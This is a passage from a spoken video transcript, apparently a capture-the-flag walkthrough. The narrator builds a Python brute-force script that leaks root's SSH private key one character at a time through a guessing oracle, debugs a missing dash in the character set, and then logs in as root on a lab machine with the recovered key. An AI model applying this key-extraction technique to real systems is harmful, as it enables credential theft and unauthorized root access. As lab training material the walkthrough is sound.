doing there is the print statement, since we're going to print the character, I don't want a line break after every character. So I said end, so it ends with nothing, so it doesn't do a line break. And then because I'm not putting a line break out there, it's not going to flush the terminal, which means we wouldn't be able to see it until a line break happens. So I'm telling it to force the flush. But first, we should make sure this exists. So we can copy this, go back here, Python 3, import brute. We also need to import our modules. And then we can say brute, root, SSH, ID, RSA. And the guess can be a single dash. And it's true. If we did anything else, it would be false. So now we have verified there is a SSH key at ID, RSA on the box. And this logic is pretty much done. So we can say if C is equal to a line break, then we set loop to false, and that's it. And the line breaks can be the very last character in the character set. So if we ever reach where root is completely fails on the whole character set, then we just set the loop to false, so a while loop dies. And I think that is it. Oh, we probably should print guess. Print guess. Okay. We can Control-C out of that. V exploit.py. Put the script here. And let's see where we screwed up. Looks like we are good. The only thing I want to do is print guess. And we can add a end is equal to this. Because it put a double line break in, because we already had a line break on a print statement. And we can fix that here real quick. Guess end is equal to nothing. And we didn't have to flush it because, again, it flushes when it sees a line break. And since one was there, we didn't have to. And now you can see it exfilling the root SSH character or key one character at a time. So I'm just going to speed up this video and then we'll test the SSH key and consider it all done. And there we go. Well, we got the end of the key. It actually did not print the last line, which is a bit odd. I guess maybe there's like a \r\n or something there. But let's just see if we can guess that very last line. So v key, whoops, let's see, paste, nope, that's not it. There we go. And then test.out, let's copy this. chmod 600 on key, sh-I root key at 10, 10, 11, 220. Identity file root not accessible. Because I got those parameters backwards. There we go. And the key works. If we xxd'd this, I bet root.text, xxd ssh idrsa, let's see, equals, where is that? It's here. 2D, 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 those are the dashes. 3D, 0A. I think 3D is a period. Or 3D is equal, that's it. Oh. Our base 64 character set did not have dash. So we got the line break, but see, because we did not have dash, that's why it stopped. So if you add the dash there and your character set, then it will work, because we went over here, we got the line break of 0A, and then it went through the entire character set, didn't find anything, so it said the file must be empty, but we just were missing a character, which is dash. So with that being said, that'll be the video. Hope you guys enjoyed it. Take care, and I'll see you all next time.